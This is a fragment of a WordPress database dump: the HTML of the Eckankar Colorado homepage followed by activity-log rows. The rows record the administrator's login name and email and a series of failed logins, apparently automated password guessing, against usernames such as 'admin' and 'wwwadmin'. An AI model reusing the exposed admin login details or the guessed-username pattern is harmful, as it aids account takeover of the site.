col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(213487,35117,'_user_id','2'),(213488,35117,'_user_login','S8zhaBda'),(213489,35117,'_user_email','nada@zipnadanot.org'),(213490,35117,'_server_remote_addr','76.130.120.x'),(213491,35117,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(213492,35118,'_user_id','2'),(213493,35118,'_user_login','S8zhaBda'),(213494,35118,'_user_email','nada@zipnadanot.org'),(213495,35118,'_message_key','user_logged_out'),(213496,35118,'_server_remote_addr','76.130.120.x'),(213497,35118,'_server_http_referer','https://eckankar-colorado.org/wp-admin/profile.php'),(213498,35119,'failed_username','admin'),(213499,35119,'server_http_user_agent','Mozilla/5.0'),(213500,35119,'_message_key','user_unknown_login_failed'),(213501,35119,'_server_remote_addr','20.216.24.x'),(213502,35120,'failed_username','admin'),(213503,35120,'server_http_user_agent','Mozilla/5.0'),(213504,35120,'_message_key','user_unknown_login_failed'),(213505,35120,'_server_remote_addr','20.216.24.x'),(213506,35121,'failed_username','admin'),(213507,35121,'server_http_user_agent','Mozilla/5.0'),(213508,35121,'_message_key','user_unknown_login_failed'),(213509,35121,'_server_remote_addr','20.216.24.x'),(213510,35122,'failed_username','admin'),(213511,35122,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(213512,35122,'_message_key','user_unknown_login_failed'),(213513,35122,'_server_remote_addr','173.236.176.x'),(213514,35123,'failed_username','admin'),(213515,35123,'server_http_user_agent','Mozilla/5.0'),(213516,35123,'_message_key','user_unknown_login_failed'),(213517,35123,'_server_remote_addr','20.216.24.x'),(213518,35124,'failed_username','admin'),(213519,35124,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(213520,35124,'_message_key','user_unknown_login_failed'),(213521,35124,'_server_remote_addr','206.189.54.x'),(213522,35125,'failed_username','admin'),(213523,35125,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(213524,35125,'_message_key','user_unknown_login_failed'),(213525,35125,'_server_remote_addr','8.219.51.x'),(213526,35126,'failed_username','admin'),(213527,35126,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(213528,35126,'_message_key','user_unknown_login_failed'),(213529,35126,'_server_remote_addr','8.129.212.x'),(213530,35127,'failed_username','admin'),(213531,35127,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(213532,35127,'_message_key','user_unknown_login_failed'),(213533,35127,'_server_remote_addr','54.37.156.x'),(213534,35128,'failed_username','admin'),(213535,35128,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(213536,35128,'_message_key','user_unknown_login_failed'),(213537,35128,'_server_remote_addr','8.129.212.x'),(213538,35129,'failed_username','admin'),(213539,35129,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(213540,35129,'_message_key','user_unknown_login_failed'),(213541,35129,'_server_remote_addr','134.122.123.x'),(213542,35130,'post_id','269115'),(213543,35130,'post_type','nf_sub'),(213544,35130,'post_title',''),(213545,35130,'_message_key','post_updated'),(213546,35130,'_server_remote_addr','102.215.15.x'),(213547,35130,'_server_http_referer','https://eckankar-colorado.org/contact-us/'),(213548,35131,'failed_username','admin'),(213549,35131,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(213550,35131,'_message_key','user_unknown_login_failed'),(213551,35131,'_server_remote_addr','37.187.135.x'),(213552,35132,'failed_username','wadminw'),(213553,35132,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(213554,35132,'_message_key','user_unknown_login_failed'),(213555,35132,'_server_remote_addr','178.128.160.x'),(213556,35133,'failed_username','wwwadmin'),(213557,35133,'server_http_user_agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(213558,35133,'_message_key','user_unknown_login_failed'),(213559,35133,'_server_remote_addr','162.0.219.x'),(213560,35134,'failed_username','datonetfullaccess'),(213561,35134,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(213562,35134,'_message_key','user_unknown_login_failed'),(213563,35134,'_xmlrpc_request','true'),(213564,35134,'_server_remote_addr','172.232.185.x'),(213565,35135,'failed_username','admin'),(213566,35135,'server_http_user_agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(213567,35135,'_message_key','user_unknown_login_failed'),(213568,35135,'_server_remote_addr','119.8.212.x'),(213569,35136,'user_id','2'),(213570,35136,'user_email','nada@zipnadanot.org'),(213571,35136,'user_login','S8zhaBda'),(213572,35136,'_user_id','2'),(213573,35136,'_user_login','S8zhaBda'),(213574,35136,'_user_email','nada@zipnadanot.org'),(213575,35136,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(213576,35136,'_message_key','user_logged_in'),(213577,35136,'_server_remote_addr','76.130.120.x'),(213578,35136,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(213579,35137,'user_id','2'),(213580,35137,'user_email','nada@zipnadanot.org'),(213581,35137,'user_login','S8zhaBda'),(213582,35137,'_user_id','2'),(213583,35137,'_user_login','S8zhaBda'),(213584,35137,'_user_email','nada@zipnadanot.org'),(213585,35137,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(213586,35137,'_message_key','user_logged_in'),(213587,35137,'_server_remote_addr','76.130.120.x'),(213588,35137,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(213589,35138,'failed_username','admin'),(213590,35138,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(213591,35138,'_message_key','user_unknown_login_failed'),(213592,35138,'_server_remote_addr','103.163.139.x'),(213593,35139,'_user_id','2'),(213594,35139,'_user_login','S8zhaBda'),(213595,35139,'_user_email','nada@zipnadanot.org'),(213596,35139,'_message_key','user_logged_out'),(213597,35139,'_server_remote_addr','76.130.120.x'),(213598,35139,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(213599,35140,'failed_username','admin'),(213600,35140,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(213601,35140,'_message_key','user_unknown_login_failed'),(213602,35140,'_server_remote_addr','69.163.250.x'),(213603,35141,'failed_username','admin'),(213604,35141,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(213605,35141,'_message_key','user_unknown_login_failed'),(213606,35141,'_server_remote_addr','34.75.65.x'),(213607,35142,'failed_username','admin'),(213608,35142,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(213609,35142,'_message_key','user_unknown_login_failed'),(213610,35142,'_server_remote_addr','137.184.179.x'),(213611,35143,'failed_username','admin'),(213612,35143,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(213613,35143,'_message_key','user_unknown_login_failed'),(213614,35143,'_server_remote_addr','91.134.248.x'),(213615,35144,'failed_username','admin'),(213616,35144,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(213617,35144,'_message_key','user_unknown_login_failed'),(213618,35144,'_server_remote_addr','69.163.224.x'),(213619,35145,'failed_username','admin'),(213620,35145,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(213621,35145,'_message_key','user_unknown_login_failed'),(213622,35145,'_server_remote_addr','156.54.11.x'),(213623,35146,'failed_username','wadminw'),(213624,35146,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(213625,35146,'_message_key','user_unknown_login_failed'),(213626,35146,'_server_remote_addr','134.122.123.x'),(213627,35147,'failed_username','wwwadmin'),(213628,35147,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(213629,35147,'_message_key','user_unknown_login_failed'),(213630,35147,'_server_remote_addr','162.0.219.x'),(213631,35148,'failed_username','admin'),(213632,35148,'server_http_user_agent','python-requests/2.6.0 CPython/2.7.5 